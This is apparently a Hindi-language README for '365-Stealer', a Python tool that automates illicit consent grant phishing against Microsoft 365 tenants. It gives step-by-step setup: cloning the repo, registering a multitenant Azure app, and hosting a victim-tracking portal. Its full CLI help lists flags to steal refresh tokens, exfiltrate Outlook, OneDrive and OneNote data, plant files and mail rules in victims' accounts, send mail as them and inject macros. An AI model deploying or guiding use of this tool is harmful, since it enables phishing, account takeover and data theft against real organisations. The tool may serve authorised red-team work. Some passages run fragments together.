
यह Azure/O365 टेनेंट्स के खिलाफ इलिसिट कंसेंट ग्रांट हमलों को स्वचालित करता है ताकि रिफ्रेश टोकन चुराए जा सकें, ईमेल/OneDrive डेटा बाहर निकाला जा सके, और CLI और वेब प्रबंधन पोर्टल के माध्यम से दुर्भावनापूर्ण Outlook नियम बनाए जा सकें।
365-स्टीलर एक Python3-आधारित उपकरण है जिसे अवैध सहमति अनुदान हमलों को स्वचालित करने के लिए डिज़ाइन किया गया है। जब कोई लक्षित उपयोगकर्ता अनजाने में हमलावर के एप्लिकेशन को अनुमति दे देता है, तो हमलावर को पीड़ित के रिफ्रेश टोकन तक पहुंच मिल जाती है। इस रिफ्रेश टोकन का उपयोग करके अन्य टोकन उत्पन्न किए जा सकते हैं, जिससे हमलावर पीड़ित की संवेदनशील डेटा जैसे ईमेल, OneDrive पर फ़ाइलें और नोट्स तक पहुंच प्राप्त कर सकता है—बिना पीड़ित से और किसी इनपुट की आवश्यकता के। मैन्युअल रूप से इसका शोषण करना समय लेने वाला हो सकता है, लेकिन 365-स्टीलर इस प्रक्रिया को सरल और स्वचालित बनाता है।
अवैध सहमति अनुदान हमला तब होता है जब कोई हमलावर Azure के भीतर एक दुर्भावनापूर्ण एप्लिकेशन पंजीकृत करता है, और संपर्क, ईमेल या दस्तावेज़ों जैसे संवेदनशील डेटा तक पहुंच का अनुरोध करता है। हमलावर उपयोगकर्ता को एप्लिकेशन को सहमति देने के लिए धोखा देता है, आमतौर पर इसे वैध बताकर प्रस्तुत करता है। एक बार जब पीड़ित "स्वीकार करें" पर क्लिक करता है, तो वे अनजाने में हमलावर को पहुंच प्रदान कर देते हैं, जिससे हमलावर पीड़ित की ओर से कार्य कर सकता है, बिना पीड़ित के संगठनात्मक क्रेडेंशियल की आवश्यकता के।
अधिक स्पष्टता से समझाने के लिए, एक बार जब उपयोगकर्ता अनुमति दे देता है, तो Entra ID हमलावर के सर्वर को एक टोकन भेजता है। यह टोकन हमलावर को ईमेल पढ़ने, ईमेल भेजने, OneDrive पर फ़ाइलों तक पहुंचने और पीड़ित के क्रेडेंशियल का उपयोग करके अन्य दुर्भावनापूर्ण गतिविधियाँ करने की क्षमता देता है। पासवर्ड चुराने पर निर्भर फ़िशिंग हमलों के विपरीत, अवैध सहमति अनुदान हमले क्लाउड एप्लिकेशन की अनुमति प्रणाली का दुरुपयोग करके प्रमाणीकरण को पूरी तरह से बायपास करते हैं।
--run-app कमांड का उपयोग करके टर्मिनल में या 365-स्टीलर प्रबंधन पोर्टल के माध्यम से अवैध सहमति अनुदान हमले करने के लिए एक नकली एप्लिकेशन होस्ट कर सकता है।--no-stealing फ्लैग का उपयोग करके, उपकरण बिना किसी और कार्रवाई के केवल टोकन चुरा सकता है, जिससे हमलावर बाद में उनका शोषण कर सकते हैं।--refresh-token, और फ्लैग के साथ, हमलावर आसानी से नए एक्सेस टोकन प्राप्त कर सकते हैं।दिए गए Python स्क्रिप्ट का उपयोग करके Azure में एक एप्लिकेशन को स्वचालित रूप से पंजीकृत करने के लिए, इन चरणों का पालन करें:
सुनिश्चित करें कि आपकी मशीन पर Python3 स्थापित है।
365-स्टीलर रिपॉजिटरी को क्लोन करें:
git clone https://github.com/AlteredSecurity/365-Stealer.git
cd 365-Stealer
आवश्यक Python मॉड्यूल स्थापित करें:
pip install -r requirements.txt
स्वचालित Azure ऐप पंजीकरण स्क्रिप्ट चलाएं:
python 365-Stealer.py --app-registration
यदि आप मैन्युअल रूप से Azure एप्लिकेशन पंजीकृत करना पसंद करते हैं, तो इन चरणों का पालन करें:
https://portal.azure.com पर जाएं और अपने खाते में साइन इन करें।App registrations पर क्लिक करें।New registration पर क्लिक करें।Accounts in any organizational directory (Any Microsoft Entra ID tenant - Multitenant) चुनें।https://<DOMAIN/IP>:<PORT>/login/authorized होना चाहिए, जहाँ आपका डोमेन या IP उस स्थान से मेल खाता है जहाँ आप 365-स्टीलर एप्लिकेशन होस्ट करेंगे।Register पर क्लिक करें।
Certificates & secrets अनुभाग पर जाएं।New client secret पर क्लिक करें, सीक्रेट के लिए एक विवरण प्रदान करें, और फिर Add पर क्लिक करें।
API permissions टैब पर क्लिक करें।Add a permission पर क्लिक करें।Microsoft Graph चुनें।Delegated permissions पर क्लिक करें जो साइन-इन किए गए उपयोगकर्ता की ओर से कार्य करेंगी।
365-स्टीलर रिपॉजिटरी को क्लोन करें:
git clone https://github.com/AlteredSecurity/365-Stealer.git
आवश्यक एप्लिकेशन स्थापित करें:
फ़ाइलें निकालें और सहेजें:
C:\xampp\htdocs\ में रखें ताकि PHP एप्लिकेशन होस्ट हो सके और Python चल सके।Python निर्भरताएँ स्थापित करें: आवश्यक Python लाइब्रेरी स्थापित करने के लिए निम्नलिखित कमांड चलाएँ।
cd C:\xampp\htdocs\365-Stealer
pip install -r requirements.txt
अतिरिक्त सेटअप निर्देशों का पालन करें: आवश्यक एप्लिकेशन और निर्भरताएँ स्थापित करने के बाद, सुनिश्चित करें कि आप yourvictims/Readme.md फ़ाइल में दिए गए निर्देशों का पालन करें। यह आपको 365-स्टीलर के ठीक से काम करने के लिए आवश्यक डेटाबेस और तालिकाएँ स्थापित करने में मार्गदर्शन करेगा।
स्क्रिप्ट पथ समायोजित करें:
C:/xampp/htdocs/yourvictims/ पर स्थित index.php फ़ाइल में 365-Stealer.py, डेटाबेस और python3 के पथ संशोधित करें।
फ़ाइल पथ में रिक्त स्थान को संभालना:
"C:/Program Files/Python/python.exe"
डिफ़ॉल्ट श्वेतसूची:
रिमोट IP जोड़ना:
IP श्वेतसूची अक्षम करना:
$enableIpWhiteList = false; सेट करें।
पहुँच प्रतिबंध: सुरक्षा कारणों से, 365-स्टीलर प्रबंधन पोर्टल तक पहुंच को हमेशा उस बुनियादी ढांचे तक सीमित रखें जिसे आप नियंत्रित करते हैं।
सार्वजनिक प्रदर्शन से बचें: 365-स्टीलर प्रबंधन पोर्टल को कभी भी सीधे इंटरनेट पर उजागर न करें। सुनिश्चित करें कि यह केवल सुरक्षित, निजी नेटवर्क के माध्यम से ही सुलभ हो ताकि संभावित समझौते से बचा जा सके।
usage: 365-Stealer.py [-h] [--app-registration] [--set-config] [--get-config] [--code CODE] [--token TOKEN] [--client-id CLIENT_ID]
[--client-secret CLIENT_SECRET] [--refresh-token REFRESH_TOKEN] [--token-path TOKEN_PATH]
[--refresh-all] [--refresh-user REFRESH_USER] [--redirect-url REDIRECT_URL]
[--database-path DATABASE_PATH] [--no-stealing] [--upload UPLOAD] [--create-rules CREATE_RULES]
[--send-mail SEND_MAIL] [--delete-all-data] [--delete-user-data DELETE_USER_DATA] [--run-app]
[--no-ssl] [--port PORT] [--disable-logs]
[--injection]
[--custom-steal {listusers,checklicence,outlook,onedrive,onenote} [{listusers,checklicence,outlook,onedrive,onenote} ...]]
[--delay DELAY]
optional arguments:
-h, --help show this help message and exit
--app-registration Azure App Registration
--set-config Set 365-Stealer Configuration
--get-config Get 365-Stealer Configuration
--code CODE Provide Authorization Code
--token TOKEN Provide Access Token
--client-id CLIENT_ID
Provide Application Client ID
--client-secret CLIENT_SECRET
Provide Application Client Secret
--refresh-token REFRESH_TOKEN
Provide Refresh Token
--token-path TOKEN_PATH
Provide Access Token file path
--refresh-all Steal all user's data again.
--refresh-user REFRESH_USER
Steal particular user's data again.(Provide EmailID)
--redirect-url REDIRECT_URL
Redirect Url
--database-path DATABASE_PATH
Provide Database Path
--no-stealing Steal only Tokens
--upload UPLOAD Add files in victim's OneDrive(Provide File Path)
--create-rules CREATE_RULES
Provide json file containing outlook rules
--send-mail SEND_MAIL
Provide json file to send email
--delete-all-data Delete all data from the database!
--delete-user-data DELETE_USER_DATA
Delete specific user data from the database!
--run-app Host the Phising App
--no-ssl Use http(port 80)
--port PORT Provide custom port to Host the Phishing App
--disable-logs Disable all http access logs
--custom-steal {listusers,checklicence,outlook,onedrive,onenote} [{listusers,checklicence,outlook,onedrive,onenote} ...]
Steal specific data
--injection Enable Macro Injection
--delay DELAY Delay the request by specifying time in seconds while stealing
365-स्टीलर के नए संस्करण के लिए ब्लॉग पोस्ट, जो पुराने संस्करण का पूरी तरह से पुनर्लेखन है। यह पोस्ट बताती है कि Microsoft 365 में Illicit Consent Grant (ICG) हमला कैसे काम करता है।
पुरानी ब्लॉग पोस्ट - 365-स्टीलर का परिचय
यदि आपको कोई बग मिलता है या फीचर अनुरोध है, तो कृपया एक मुद्दा उठाएं।
यदि आप किसी प्रोजेक्ट में योगदान देना चाहते हैं और इसे बेहतर बनाना चाहते हैं, तो आपकी सहायता का बहुत स्वागत है।
--client-id--client-secret--app-registration फ्लैग Azure ऐप पंजीकरण की प्रक्रिया को स्वचालित करता है, जिससे मैन्युअल हस्तक्षेप के बिना हमले के बुनियादी ढांचे को स्थापित करना आसान हो जाता है।--custom-steal फ्लैग के साथ, हमलावर OneDrive, Outlook आदि जैसे विशिष्ट स्रोतों से चुनिंदा डेटा चुरा सकते हैं।